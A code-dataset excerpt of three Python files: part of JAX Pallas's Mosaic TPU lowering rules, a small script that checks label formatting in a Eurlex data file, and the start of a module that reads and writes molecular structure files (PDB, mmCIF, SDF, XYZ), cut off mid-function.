aval_to_ir_type(lhs_aval.update(shape=(lhs_aval.shape[0],)))\n acc = arith.ConstantOp(\n red_type, ir.DenseElementsAttr.get_splat(red_type, val)\n )\n red = vector.MultiDimReductionOp(\n ir.Attribute.parse(\"#vector.kind\"),\n arith.MulFOp(x, y),\n acc,\n ir.ArrayAttr.get(\n [ir.IntegerAttr.get(ir.IntegerType.get_signless(64), 1)]\n ),\n )\n return vector.ShapeCastOp(out_type, red).result\n\n if lhs_dims == (1,):\n lhs_dim_attr = ir.Attribute.parse(\"affine_map<(i, j, k) -> (i, k)>\")\n elif lhs_dims == (0,):\n lhs_dim_attr = ir.Attribute.parse(\"affine_map<(i, j, k) -> (k, i)>\")\n if rhs_dims == (0,):\n rhs_dim_attr = ir.Attribute.parse(\"affine_map<(i, j, k) -> (k, j)>\")\n elif rhs_dims == (1,):\n rhs_dim_attr = ir.Attribute.parse(\"affine_map<(i, j, k) -> (j, k)>\")\n out_tile = arith.ConstantOp(\n out_type, ir.DenseElementsAttr.get_splat(out_type, val)\n )\n op = vector.ContractionOp(\n out_type,\n x,\n y,\n out_tile,\n indexing_maps=ir.ArrayAttr.get([\n lhs_dim_attr,\n rhs_dim_attr,\n ir.Attribute.parse(\"affine_map<(i, j, k) -> (i, j)>\"),\n ]),\n iterator_types=ir.ArrayAttr.get([\n ir.Attribute.parse(\"#vector.iterator_type\"),\n ir.Attribute.parse(\"#vector.iterator_type\"),\n ir.Attribute.parse(\"#vector.iterator_type\"),\n ]),\n )\n if precision is not None:\n if precision[0] != precision[1]:\n raise NotImplementedError(\"Per-operand dot precision unsupported\")\n precision = precision[0]\n if precision is None or precision == lax.Precision.DEFAULT:\n pass # That's the default in Mosaic.\n elif precision == lax.Precision.HIGHEST:\n op.attributes[\"precision\"] = ir.Attribute.parse(\n \"#tpu.contract_precision\"\n )\n else:\n raise NotImplementedError(f\"Unsupported dot precision: {precision}\")\n return op.result\n\n\nlowering_rules[lax.dot_general_p] = _dot_general_lowering_rule\n\n_INT_DTYPES = {\n 8: np.dtype(np.int8),\n 16: np.dtype(np.int16),\n 32: np.dtype(np.int32),\n}\n\n\ndef _convert_element_type_lowering_rule(\n ctx: LoweringRuleContext, x, *, new_dtype, weak_type\n):\n del weak_type\n out_aval = ctx.avals_out[0]\n old_dtype = ctx.avals_in[0].dtype\n out_type = aval_to_ir_type(out_aval)\n if old_dtype == new_dtype:\n return x\n if jnp.issubdtype(old_dtype, jnp.floating) and jnp.issubdtype(\n new_dtype, jnp.floating\n ):\n if old_dtype.itemsize < new_dtype.itemsize:\n return arith.ExtFOp(out_type, x).result\n else:\n return arith.TruncFOp(out_type, x).result\n elif old_dtype == jnp.bool_ and jnp.issubdtype(new_dtype, jnp.integer):\n return arith.ExtSIOp(out_type, x).result\n elif jnp.issubdtype(old_dtype, jnp.signedinteger) and jnp.issubdtype(\n new_dtype, jnp.floating\n ):\n return arith.SIToFPOp(out_type, x).result\n elif jnp.issubdtype(old_dtype, jnp.signedinteger) and jnp.issubdtype(\n new_dtype, jnp.signedinteger\n ):\n if old_dtype.itemsize < new_dtype.itemsize:\n return arith.ExtSIOp(out_type, x).result\n else:\n return arith.TruncIOp(out_type, x).result\n elif jnp.issubdtype(old_dtype, jnp.floating) and jnp.issubdtype(\n new_dtype, jnp.signedinteger\n ):\n return arith.FPToSIOp(out_type, x).result\n raise NotImplementedError(f\"Unsupported cast: {old_dtype} -> {new_dtype}\")\n\n\nlowering_rules[lax.convert_element_type_p] = _convert_element_type_lowering_rule\n\n\ndef _bcast(x, y, x_aval, y_aval, out_aval):\n if isinstance(x, (np.ndarray, np.uint32, int, float)):\n if hasattr(y, \"type\") and y.type == ir.IndexType.get():\n mlir_type = y.type\n else:\n mlir_type = mlir.dtype_to_ir_type(x_aval.dtype)\n x = ir_constant(x, mlir_type)\n if isinstance(y, (np.ndarray, np.uint32, int, float)):\n if hasattr(x, \"type\") and x.type == ir.IndexType.get():\n mlir_type = x.type\n else:\n mlir_type = mlir.dtype_to_ir_type(y_aval.dtype)\n y = ir_constant(y, mlir_type)\n out_shape = out_aval.shape\n bcast_shape = ir.VectorType.get(\n list(out_shape), mlir.dtype_to_ir_type(out_aval.dtype)\n )\n if x_aval.shape != out_aval.shape:\n x = vector.BroadcastOp(bcast_shape, x)\n if y_aval.shape != out_aval.shape:\n y = vector.BroadcastOp(bcast_shape, y)\n return x, y\n\n\ndef _reshape_lowering_rule(ctx: LoweringRuleContext, x, new_sizes, dimensions):\n if dimensions is not None:\n raise NotImplementedError\n if any(d is None for d in new_sizes):\n raise NotImplementedError\n return vector.ShapeCastOp(aval_to_ir_type(ctx.avals_out[0]), x).result\n\n\nlowering_rules[lax.reshape_p] = _reshape_lowering_rule\n\n\ndef _iota_lowering_rule(ctx: LoweringRuleContext, dtype, shape, dimension):\n out_type = aval_to_ir_type(ctx.avals_out[0])\n return tpu.IotaOp(out_type, dimension=dimension).result\n\n\nlowering_rules[lax.iota_p] = _iota_lowering_rule\n\n\ndef _transpose_lowering_rule(ctx: LoweringRuleContext, x, *, permutation):\n if permutation != (1, 0):\n raise NotImplementedError\n out_type = aval_to_ir_type(ctx.avals_out[0])\n i64_type = ir.IntegerType.get_signless(64)\n transp = ir.ArrayAttr.get(\n [ir.IntegerAttr.get(i64_type, i) for i in permutation]\n )\n return vector.TransposeOp(out_type, x, transp).result\n\n\nlowering_rules[lax.transpose_p] = _transpose_lowering_rule\n\n\ndef _add_lowering_rule(ctx: LoweringRuleContext, x, y):\n x, y = _bcast(x, y, ctx.avals_in[0], ctx.avals_in[1], ctx.avals_out[0])\n (aval_out,) = ctx.avals_out\n if jnp.issubdtype(aval_out.dtype, jnp.integer):\n return arith.AddIOp(x, y).result\n if jnp.issubdtype(aval_out.dtype, jnp.floating):\n return arith.AddFOp(x, y).result\n raise NotImplementedError(aval_out.dtype)\n\n\nlowering_rules[lax.add_p] = _add_lowering_rule\n\n\ndef _max_lowering_rule(ctx: LoweringRuleContext, x, y):\n x, y = _bcast(x, y, ctx.avals_in[0], ctx.avals_in[1], ctx.avals_out[0])\n (aval_out,) = ctx.avals_out\n if jnp.issubdtype(aval_out.dtype, jnp.signedinteger):\n return arith.MaxSIOp(x, y).result\n elif jnp.issubdtype(aval_out.dtype, jnp.unsignedinteger):\n return arith.MaxUIOp(x, y).result\n elif jnp.issubdtype(aval_out.dtype, jnp.floating):\n return arith.MaxFOp(x, y).result\n raise NotImplementedError(aval_out.dtype)\n\n\nlowering_rules[lax.max_p] = _max_lowering_rule\n\n\ndef _sub_lowering_rule(ctx: LoweringRuleContext, x, y):\n x, y = _bcast(x, y, ctx.avals_in[0], ctx.avals_in[1], ctx.avals_out[0])\n (aval_out,) = ctx.avals_out\n if isinstance(x, (np.ndarray, int, float)):\n x = ir_constant(x, y.type)\n elif isinstance(y, (np.ndarray, int, float)):\n y = ir_constant(y, x.type)\n if jnp.issubdtype(aval_out.dtype, jnp.integer):\n return arith.SubIOp(x, y).result\n if jnp.issubdtype(aval_out.dtype, jnp.floating):\n return arith.SubFOp(x, y).result\n raise NotImplementedError(aval_out.dtype)\n\n\nlowering_rules[lax.sub_p] = _sub_lowering_rule\n\n\ndef _mul_lowering_rule(ctx: LoweringRuleContext, x, y):\n x, y = _bcast(x, y, ctx.avals_in[0], ctx.avals_in[1], ctx.avals_out[0])\n (aval_out,) = ctx.avals_out\n if isinstance(x, (np.ndarray, int, float)):\n x = ir_constant(x, y.type)\n elif isinstance(y, (np.ndarray, int, float)):\n y = ir_constant(y, x.type)\n if jnp.issubdtype(aval_out.dtype, jnp.integer):\n return arith.MulIOp(x, y).result\n if jnp.issubdtype(aval_out.dtype, jnp.floating):\n return arith.MulFOp(x, y).result\n raise NotImplementedError(aval_out.dtype)\n\n\nlowering_rules[lax.mul_p] = _mul_lowering_rule\n\n\ndef _div_lowering_rule(ctx: LoweringRuleContext, x, y):\n x, y = _bcast(x, y, ctx.avals_in[0], ctx.avals_in[1], ctx.avals_out[0])\n (aval_out,) = ctx.avals_out\n if jnp.issubdtype(aval_out.dtype, jnp.integer):\n return arith.DivSIOp(x, y).result\n if jnp.issubdtype(aval_out.dtype, jnp.unsignedinteger):\n return arith.DivUIOp(x, y).result\n elif jnp.issubdtype(aval_out.dtype, jnp.floating):\n return arith.DivFOp(x, y).result\n raise NotImplementedError(aval_out.dtype)\n\n\nlowering_rules[lax.div_p] = _div_lowering_rule\n\n\ndef _rem_lowering_rule(ctx: LoweringRuleContext, x, y):\n x, y = _bcast(x, y, ctx.avals_in[0], ctx.avals_in[1], ctx.avals_out[0])\n (aval_out,) = ctx.avals_out\n if jnp.issubdtype(aval_out.dtype, jnp.integer):\n return arith.RemSIOp(x, y).result\n if jnp.issubdtype(aval_out.dtype, jnp.unsignedinteger):\n return arith.RemUIOp(x, y).result\n elif jnp.issubdtype(aval_out.dtype, jnp.floating):\n return arith.RemFOp(x, y).result\n raise NotImplementedError(aval_out.dtype)\n\n\nlowering_rules[lax.rem_p] = _rem_lowering_rule\n\n\ndef _abs_lowering_rule(ctx: LoweringRuleContext, x):\n (aval_out,) = ctx.avals_out\n if jnp.issubdtype(aval_out.dtype, jnp.integer):\n return math.AbsIOp(x).result\n raise NotImplementedError(aval_out.dtype)\n\n\nlowering_rules[lax.abs_p] = _abs_lowering_rule\n\n\ndef _neg_lowering_rule(ctx: LoweringRuleContext, x):\n (x_aval,) = ctx.avals_in\n new_ctx = ctx.replace(\n avals_in=(jax_core.ShapedArray((), x_aval.dtype), x_aval),\n block_shapes=((), *ctx.block_shapes)\n )\n return _sub_lowering_rule(new_ctx, np.array(0, dtype=x_aval.dtype), x)\n\n\nlowering_rules[lax.neg_p] = _neg_lowering_rule\n\n\ndef _rsqrt_lowering_rule(ctx: LoweringRuleContext, x):\n return math.RsqrtOp(x).result\n\n\nlowering_rules[lax.rsqrt_p] = _rsqrt_lowering_rule\n\n\ndef _exp_lowering_rule(ctx: LoweringRuleContext, x):\n return math.ExpOp(x).result\n\n\nlowering_rules[lax.exp_p] = _exp_lowering_rule\n\n\ndef _pow_lowering_rule(ctx: LoweringRuleContext, x, y):\n if not isinstance(x, ir.Value) and x == 2.:\n return math.Exp2Op(y).result\n raise NotImplementedError(\"Only support for 2^x\")\n\n\nlowering_rules[lax.pow_p] = _pow_lowering_rule\n\n\ndef _exp2_lowering_rule(ctx: LoweringRuleContext, x):\n # exp2 in JAX lowers to exp(ln2 * x), not to pow2. We match that behavior\n # here.\n return lower_fun(lambda x: jnp.exp(np.log(2) * x), multiple_results=False)(\n ctx, x)\n\n\nlowering_rules[lax.exp2_p] = _exp2_lowering_rule\n\ndef _logistic_lowering_rule(ctx: LoweringRuleContext, x):\n neg_x = arith.NegFOp(x).result\n exp_neg_x = math.ExpOp(neg_x).result\n aval_out = ctx.avals_out[0]\n out_type = ir.VectorType.get(\n aval_out.shape, mlir.dtype_to_ir_type(aval_out.dtype)\n )\n one = vector.BroadcastOp(out_type, ir_constant(1.0))\n denom = arith.AddFOp(one, exp_neg_x).result\n return arith.DivFOp(one, denom).result\n\n\nlowering_rules[lax.logistic_p] = _logistic_lowering_rule\n\n\ndef _tanh_lowering_rule(ctx: LoweringRuleContext, x):\n return math.TanhOp(x).result\n\n\nlowering_rules[lax.tanh_p] = _tanh_lowering_rule\n\n\ndef _log_lowering_rule(ctx: LoweringRuleContext, x):\n return math.LogOp(x).result\n\n\nlowering_rules[lax.log_p] = _log_lowering_rule\n\n_cmpi_lowering_types = {\n lax.eq_p: 0,\n lax.ne_p: 1,\n lax.lt_p: 2,\n lax.le_p: 3,\n lax.gt_p: 4,\n lax.ge_p: 5,\n}\n\n_cmpf_lowering_types = {\n lax.eq_p: 1,\n lax.ne_p: 6,\n}\n\n\ndef _cmp_lowering_rule(prim, ctx: LoweringRuleContext, x, y):\n x_aval, y_aval = ctx.avals_in\n x_dtype, y_dtype = x_aval.dtype, y_aval.dtype\n if isinstance(y, (np.generic, np.ndarray, int, float)):\n y = ir_constant(y, mlir_type=mlir.dtype_to_ir_type(y_dtype))\n if isinstance(x, (np.generic, np.ndarray, int, float)):\n x = ir_constant(x, mlir_type=mlir.dtype_to_ir_type(x_dtype))\n bcast_shape = np.broadcast_shapes(x_aval.shape, y_aval.shape)\n if x_aval.shape != bcast_shape:\n bcast_shape = ir.VectorType.get(\n list(bcast_shape), mlir.dtype_to_ir_type(x_aval.dtype)\n )\n x = vector.BroadcastOp(bcast_shape, x).result\n if y_aval.shape != bcast_shape:\n bcast_shape = ir.VectorType.get(\n list(bcast_shape), mlir.dtype_to_ir_type(y_aval.dtype)\n )\n y = vector.BroadcastOp(bcast_shape, y).result\n if jnp.issubdtype(x_dtype, jnp.integer) and jnp.issubdtype(\n y_dtype, jnp.integer\n ):\n pred = _cmpi_lowering_types[prim]\n predicate = ir.IntegerAttr.get(ir.IntegerType.get_signless(64), pred)\n return arith.CmpIOp(predicate, x, y).result\n elif jnp.issubdtype(x_dtype, jnp.floating) and jnp.issubdtype(\n y_dtype, jnp.floating\n ):\n pred = _cmpf_lowering_types[prim]\n predicate = ir.IntegerAttr.get(ir.IntegerType.get_signless(64), pred)\n return arith.CmpFOp(predicate, x, y).result\n raise NotImplementedError((x_dtype, y_dtype))\n\n\nlowering_rules[lax.eq_p] = functools.partial(_cmp_lowering_rule, lax.eq_p)\nlowering_rules[lax.ne_p] = functools.partial(_cmp_lowering_rule, lax.ne_p)\nlowering_rules[lax.lt_p] = functools.partial(_cmp_lowering_rule, lax.lt_p)\nlowering_rules[lax.le_p] = functools.partial(_cmp_lowering_rule, lax.le_p)\nlowering_rules[lax.gt_p] = functools.partial(_cmp_lowering_rule, lax.gt_p)\nlowering_rules[lax.ge_p] = functools.partial(_cmp_lowering_rule, lax.ge_p)\n\n\ndef _and_lowering_rule(ctx: LoweringRuleContext, lhs, rhs):\n return arith.AndIOp(lhs, rhs).result\n\n\nlowering_rules[lax.and_p] = _and_lowering_rule\n\n\ndef _or_lowering_rule(ctx: LoweringRuleContext, lhs, rhs):\n return arith.OrIOp(lhs, rhs).result\n\n\nlowering_rules[lax.or_p] = _or_lowering_rule\n\ndef _canonicalize_value(a: np.generic | np.ndarray | int | float | ir.Value,\n dtype: np.dtype | None = None) -> ir.Value:\n # TODO(sharadmv): use this function in most lowering rules and allow some\n # rules to opt out.\n if isinstance(a, ir.Value):\n return a\n mlir_type = None\n if dtype is not None:\n mlir_type = mlir.dtype_to_ir_type(dtype)\n return ir_constant(a, mlir_type=mlir_type)\n\ndef _select_n_lowering_rule(ctx: LoweringRuleContext, pred, x, *args):\n if len(args) > 1:\n raise NotImplementedError(\"select_n only supported with <= 2 arguments\")\n pred_aval, x_aval = ctx.avals_in[:2]\n pred = _canonicalize_value(pred, dtype=pred_aval.dtype)\n if pred_aval.dtype != np.dtype(np.bool_):\n lower_ctx = LoweringRuleContext(\n ctx.lowering_context,\n avals_in=[pred_aval],\n avals_out=[pred_aval.update(dtype=np.bool_)],\n block_shapes=[None],\n )\n pred = lower_fun(lambda x: x != 0, multiple_results=False)(lower_ctx, pred)\n x_dtype = x_aval.dtype\n x = _canonicalize_value(x, dtype=x_dtype)\n if not args:\n return x\n args = map(partial(_canonicalize_value, dtype=x_dtype), args)\n # Assume x and y\n y, = args\n return arith.SelectOp(pred, y, x).result\n\n\nlowering_rules[lax.select_n_p] = _select_n_lowering_rule\n\ndef _for_lowering_rule(\n ctx: LoweringRuleContext,\n *args,\n jaxpr,\n nsteps,\n reverse,\n unroll,\n which_linear,\n):\n should_discharge = [\n not isinstance(aval, state.AbstractRef) for aval in ctx.avals_in\n ]\n jaxpr, () = state_discharge.discharge_state(\n jaxpr, (), should_discharge=[False, *should_discharge]\n )\n for i in range(nsteps):\n if reverse:\n i = nsteps - i - 1\n i = ir_constant(i)\n lowering_context = ctx.lowering_context.replace(\n block_shapes=[(), *ctx.block_shapes],\n )\n non_ref_args = jaxpr_subcomp(lowering_context, jaxpr, i, *args)\n non_ref_args_iter = iter(non_ref_args)\n args = [\n next(non_ref_args_iter) if s else a\n for a, s in zip(args, should_discharge)\n ]\n return args\n\n\nlowering_rules[for_loop.for_p] = _for_lowering_rule\n\n\ndef _lower_jaxpr_to_unrolled_for_loop(ctx: LoweringRuleContext,\n jaxpr: jax_core.Jaxpr, start: int,\n num_steps: int, consts, *args,\n has_loop_index: bool):\n for i in range(start, start + num_steps):\n if has_loop_index:\n lowering_context = ctx.lowering_context.replace(\n block_shapes=ctx.block_shapes)\n args = jaxpr_subcomp(\n lowering_context, jaxpr, *consts,\n ir_constant(i, mlir_type=mlir.dtype_to_ir_type(jnp.dtype('int32'))),\n *args)\n else:\n lowering_context = ctx.lowering_context.replace(\n block_shapes=ctx.block_shapes[:len(consts)]\n + ctx.block_shapes[len(consts) + 1:],\n )\n args = jaxpr_subcomp(lowering_context, jaxpr, *consts, *args)\n return args\n\n\ndef _scan_lowering_rule(\n ctx: LoweringRuleContext,\n *args,\n jaxpr: jax_core.Jaxpr,\n linear: tuple[bool, ...],\n length: int,\n reverse: bool,\n unroll: bool,\n num_consts: int,\n num_carry: int,\n):\n # Can only handle fori_loop-like scans\n num_extensive = len(args) - num_consts - num_carry\n if num_extensive: raise NotImplementedError\n if reverse: raise NotImplementedError\n del linear, num_extensive, unroll, reverse\n\n jaxpr, jaxpr_consts = jaxpr.jaxpr, jaxpr.consts\n if jaxpr_consts: raise NotImplementedError\n del jaxpr_consts\n\n jaxpr, has_loop_index = (\n pallas_utils.pattern_match_scan_to_fori_loop(jaxpr, num_consts, num_carry)\n )\n consts, args = split_list(args, [num_consts])\n if has_loop_index:\n loop_index_start, *args = args\n else:\n loop_index_start = 0\n out = _lower_jaxpr_to_unrolled_for_loop(ctx, jaxpr, loop_index_start, length,\n consts, *args,\n has_loop_index=has_loop_index)\n if has_loop_index:\n out = [ir_constant(length,\n mlir_type=mlir.dtype_to_ir_type(jnp.dtype('int32'))),\n *out]\n return out\nlowering_rules[lax.scan_p] = _scan_lowering_rule\n\ndef _cond_lowering_rule(ctx: LoweringRuleContext, *args, branches, linear):\n del linear\n if len(branches) > 2:\n raise NotImplementedError\n pred, *args = args\n out_types = map(aval_to_ir_type, ctx.avals_out)\n pred = arith.TruncIOp(\n aval_to_ir_type(jax_core.ShapedArray((), jnp.bool_)), pred\n ).result\n # Specialize to singleton `if`s\n singleton = len(out_types) == 1\n if singleton:\n out_types = out_types[0]\n if_op = scf.IfOp(pred, out_types, hasElse=True)\n lowering_context = ctx.lowering_context.replace(\n block_shapes=ctx.block_shapes[1:],\n )\n with ir.InsertionPoint(if_op.then_block):\n out = jaxpr_subcomp(lowering_context, branches[1].jaxpr, *args)\n scf.YieldOp(out)\n with ir.InsertionPoint(if_op.else_block):\n out = jaxpr_subcomp(lowering_context, branches[0].jaxpr, *args)\n scf.YieldOp(out)\n if singleton:\n return if_op.result\n return if_op.results\n\n\nlowering_rules[lax.cond_p] = _cond_lowering_rule\n\n\ndef _pjit_lowering_rule(ctx: LoweringRuleContext, *args, jaxpr, **_):\n args = [\n a if isinstance(a, ir.Value) else ir_constant(a, aval_to_ir_type(aval))\n for a, aval in zip(args, ctx.avals_in)\n ]\n lowering_context = ctx.lowering_context.replace(block_shapes=ctx.block_shapes)\n return jaxpr_subcomp(lowering_context, jaxpr.jaxpr, *args)\n\n\nlowering_rules[pjit.pjit_p] = _pjit_lowering_rule\n\n\ndef _custom_jvp_call_lowering_rule(\n ctx: LoweringRuleContext,\n *args,\n call_jaxpr: jax_core.Jaxpr,\n jvp_jaxpr_thunk: Callable,\n num_consts: int,\n symbolic_zeros: bool,\n):\n del jvp_jaxpr_thunk\n if symbolic_zeros: raise NotImplementedError\n if num_consts: raise NotImplementedError\n if call_jaxpr.consts: raise NotImplementedError\n lowering_context = ctx.lowering_context.replace(block_shapes=ctx.block_shapes)\n return jaxpr_subcomp(lowering_context, call_jaxpr.jaxpr, *args)\n\n\nlowering_rules[custom_derivatives.custom_jvp_call_p] = (\n _custom_jvp_call_lowering_rule)\n\n\ndef _debug_callback_lowering_rule(ctx: LoweringRuleContext, *args, **kwargs):\n del ctx, args, kwargs\n # No-op debug callbacks in Mosaic for now\n return []\n\n\nlowering_rules[debugging.debug_callback_p] = _debug_callback_lowering_rule\n\n\ndef _program_id_lowering_rule(ctx: LoweringRuleContext, *, axis: int):\n if ctx.lowering_context.grid_indices is None:\n raise ValueError(\n f\"program id: {axis} was passed, but user did not provide a grid.\"\n )\n length = len(ctx.lowering_context.grid_indices)\n if not (0 <= axis < length):\n raise ValueError(\n f\"user passed in program id with axis: {axis}, but grid only has\"\n f\" length: {length}\"\n )\n return ctx.lowering_context.grid_indices[axis]\nlowering_rules[primitives.program_id_p] = _program_id_lowering_rule\n\n\ndef _repeat_lowering_rule(ctx: LoweringRuleContext, x, *, repeats, axis):\n (out_aval,) = ctx.avals_out\n return tpu.RepeatOp(aval_to_ir_type(out_aval), x, axis, repeats).result\n\n\nlowering_rules[tpu_primitives.repeat_p] = _repeat_lowering_rule\n\n\ndef _slice_lowering_rule(\n ctx: LoweringRuleContext, *args, limit_indices, start_indices, strides\n):\n \"\"\"Lowers a slice to vector dialect.\"\"\"\n (aval_out,) = ctx.avals_out\n if strides is None:\n strides = [1] * len(start_indices)\n\n sizes = np.array(limit_indices) - np.array(start_indices)\n\n op = vector.ExtractStridedSliceOp(\n aval_to_ir_type(aval_out), args[0], start_indices, sizes, strides\n )\n return op.result\n\n\nlowering_rules[lax.slice_p] = _slice_lowering_rule\n\n\ndef _xor_lowering_rule(ctx: LoweringRuleContext, x, y):\n if isinstance(x, (np.generic, np.ndarray, int, float)):\n x = ir_constant(x)\n if isinstance(y, (np.generic, np.ndarray, int, float)):\n y = ir_constant(y)\n return arith.XOrIOp(x, y).result\n\n\nlowering_rules[lax.xor_p] = _xor_lowering_rule\n\n\ndef _shift_left_lowering_rule(ctx: LoweringRuleContext, x, d):\n if isinstance(x, (np.generic, np.ndarray, int)):\n x = ir_constant(x)\n if isinstance(d, (np.generic, np.ndarray, int)):\n d = ir_constant(d)\n return arith.ShLIOp(x, d).result\n\n\nlowering_rules[lax.shift_left_p] = _shift_left_lowering_rule\n\n\ndef _shift_right_logical_lowering_rules(ctx: LoweringRuleContext, x, d):\n if isinstance(x, (np.generic, np.ndarray, int)):\n x = ir_constant(x)\n if isinstance(d, (np.generic, np.ndarray, int)):\n d = ir_constant(d)\n return arith.ShRUIOp(x, d).result\n\n\nlowering_rules[lax.shift_right_logical_p] = _shift_right_logical_lowering_rules\n\n\ndef _trace_start_lowering_rule(\n ctx: LoweringRuleContext, *, message: str, level: int\n):\n return tpu.TraceStartOp(message=message, level=level).results\n\n\nlowering_rules[tpu_primitives.trace_start_p] = _trace_start_lowering_rule\n\n\ndef _trace_stop_lowering_rule(ctx: LoweringRuleContext):\n return tpu.TraceStopOp().results\n\n\nlowering_rules[tpu_primitives.trace_stop_p] = _trace_stop_lowering_rule\n","sub_path":"jax/_src/pallas/mosaic/lowering.py","file_name":"lowering.py","file_ext":"py","file_size_in_byte":47157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"147579948","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Python version: 3.6\nimport time\nfrom itertools import islice\nimport torch\nfrom torch import nn, autograd\nimport numpy as np\nimport pdb\n\ndataset = \"../data/Eurlex/train.txt\"\nnum_sample = 15539\n\ndef check_data(files,num_sample):\n with open(files, 'r', encoding='utf-8') as f:\n file_array = f.readlines()\n print(len(file_array))\n \n lines = []\n lines += [file_array[i] for i in range(num_sample)]\n count = 0\n for line in lines:\n itms = line.strip().split()\n try:\n y_idxs = [int(itm) for itm in itms[0].split(',')]\n except:\n print(line)\n\ncheck_data(dataset, num_sample)\n ","sub_path":"utils/check_data.py","file_name":"check_data.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"181664541","text":"\"\"\"Methods to convert between different file formats.\"\"\"\nimport collections as col\nimport gzip\nimport os\nimport re\n\nimport Bio.PDB.Atom\nimport Bio.PDB.Chain\nimport Bio.PDB.Model\nimport Bio.PDB.Residue\nimport Bio.PDB.Structure\nimport numpy as np\nimport pandas as pd\n\npatterns = {\n 'pdb': 'pdb[0-9]*$',\n 'pdb.gz': 'pdb[0-9]*\\.gz$',\n 'mmcif': '(mm)?cif$',\n 'sharded': '@[0-9]+',\n 'sdf': 'sdf[0-9]*$',\n 'xyz': 'xyz[0-9]*$',\n 'silent': 'out$',\n}\n\n_regexes = {k: re.compile(v) for k, v in patterns.items()}\n\n\ndef is_sharded(f):\n \"\"\"If file is in sharded format.\"\"\"\n return _regexes['sharded'].search(str(f))\n\n\ndef is_pdb(f):\n \"\"\"If file is in pdb format.\"\"\"\n return _regexes['pdb'].search(str(f))\n\n\ndef is_mmcif(f):\n \"\"\"If file is in mmcif format.\"\"\"\n return _regexes['mmcif'].search(str(f))\n\n\ndef is_sdf(f):\n \"\"\"If file is in sdf format.\"\"\"\n return _regexes['sdf'].search(str(f))\n\n\ndef is_pdb_gz(f):\n \"\"\"If file is in mmcif format.\"\"\"\n return _regexes['pdb.gz'].search(str(f))\n\ndef is_xyz(f):\n \"\"\"If file is in xyz format.\"\"\"\n return _regexes['xyz'].search(str(f))\n\n\ndef read_any(f, name=None):\n \"\"\"Read file into biopython structure.\"\"\"\n if is_pdb(f):\n return read_pdb(f, name)\n elif is_pdb_gz(f):\n return read_pdb_gz(f, name)\n elif is_mmcif(f):\n return read_mmcif(f, name)\n elif is_sdf(f):\n return read_sdf(f, name)\n elif is_xyz(f):\n return read_xyz(f, name)\n else:\n raise ValueError(f\"Unrecognized filetype for {f:}\")\n\n\ndef read_pdb_gz(pdb_gz_file, name=None):\n if name is None:\n name = os.path.basename(pdb_gz_file)\n parser = Bio.PDB.PDBParser(QUIET=True)\n bp = parser.get_structure(\n name, gzip.open(pdb_gz_file, mode='rt', encoding='latin1'))\n return bp\n\n\ndef read_pdb(pdb_file, name=None):\n \"\"\"Load pdb file in to biopython representation.\"\"\"\n if name is None:\n name = os.path.basename(pdb_file)\n parser = Bio.PDB.PDBParser(QUIET=True)\n bp = parser.get_structure(name, pdb_file)\n return bp\n\n\ndef read_mmcif(mmcif_file, name=None):\n \"\"\"Load mmcif file in to biopython representation.\"\"\"\n if name is None:\n os.path.basename(mmcif_file)\n parser = Bio.PDB.MMCIFParser(QUIET=True)\n return parser.get_structure(name, mmcif_file)\n\n\ndef read_sdf(sdf_file, name=None, sanitize=False, add_hs=False, remove_hs=False):\n dflist = []\n molecules = read_sdf_to_mol(sdf_file, sanitize=sanitize,\n add_hs=add_hs, remove_hs=remove_hs)\n for im,m in enumerate(molecules):\n if m is not None:\n df = mol_to_df(m, residue=im,\n ensemble = m.GetProp(\"_Name\"),\n structure = m.GetProp(\"_Name\"),\n model = m.GetProp(\"_Name\"))\n dflist.append(df)\n assert len(dflist) >= 1\n if len(dflist) > 1:\n bp = df_to_bp(merge_dfs(dflist))\n else:\n bp = df_to_bp(dflist[0])\n\n return bp\n\n\ndef read_sdf_multi(sdf_files, name=None, sanitize=False, add_hs=False, remove_hs=False):\n dflist = []\n for sdf_file in sdf_files:\n molecules = read_sdf_to_mol(sdf_file, sanitize=sanitize,\n add_hs=add_hs, remove_hs=remove_hs)\n for im,m in enumerate(molecules):\n if m is not None:\n df = mol_to_df(m, residue=im,\n ensemble = m.GetProp(\"_Name\"),\n structure = m.GetProp(\"_Name\"),\n model = m.GetProp(\"_Name\"))\n dflist.append(df)\n bp = df_to_bp(merge_dfs(dflist))\n return bp\n\n\ndef combine_sdfs(sdf_files, big_sdf):\n \"\"\"Concatenate several SDF files into one.\"\"\"\n with open(big_sdf, 'w') as outfile:\n for fname in sdf_files:\n with open(fname) as infile:\n for line in infile:\n outfile.write(line)\n\n\ndef write_pdb(out_file, structure, **kwargs):\n \"\"\"Write a biopython structure to a pdb file.\"\"\"\n io = Bio.PDB.PDBIO()\n io.set_structure(structure)\n io.save(out_file, **kwargs)\n return\n\n\ndef write_mmcif(out_file, structure):\n \"\"\"Write a biopython structure to an mmcif file.\"\"\"\n io = Bio.PDB.MMCIFIO()\n io.set_structure(structure)\n io.save(out_file)\n return\n\n\ndef read_xyz_to_df(inputfile, gdb_data=False):\n \"\"\"Read an XYZ file (optionally with GDB9-specific data)\"\"\"\n with open(inputfile) as f:\n # Reading number of atoms in the molecule\n num_atoms = int(f.readline().strip())\n # Loading GDB ID and label data\n line_labels = f.readline().strip().split('\\t')\n name = line_labels[0]\n if gdb_data: data = [float(ll) for ll in line_labels[1:]]\n # Skip atom data (will be read using pandas below)\n for n in range(num_atoms): f.readline()\n # Harmonic vibrational frequencies\n if gdb_data:\n freq = [float(ll) for ll in f.readline().strip().split('\\t')]\n # SMILES and InChI\n if gdb_data: smiles = f.readline().strip().split('\\t')[0]\n if gdb_data: inchi = f.readline().strip().split('\\t')[0]\n # Define columns: element, x, y, z, Mulliken charges (GDB only)\n columns = ['element','x', 'y', 'z']\n if gdb_data: columns += ['charge']\n # Load atom information\n molecule = pd.read_table(inputfile, names=columns,\n skiprows=2, nrows=num_atoms,\n delim_whitespace=True)\n # Name the dataframe\n molecule.name = name\n molecule.index.name = name\n # return molecule info\n if gdb_data:\n return molecule, data, freq, smiles, inchi\n else:\n return molecule\n\n\ndef read_xyz(xyz_file, name=None, gdb=False):\n \"\"\"Load xyz file in to biopython representation.\"\"\"\n # Load the xyz file into a dataframe\n if gdb:\n df, data, freq, smiles, inchi = read_xyz_to_df(xyz_file, gdb_data=True)\n else:\n df = read_xyz_to_df(xyz_file)\n if name is not None: df.index.name = name\n # Make up atom 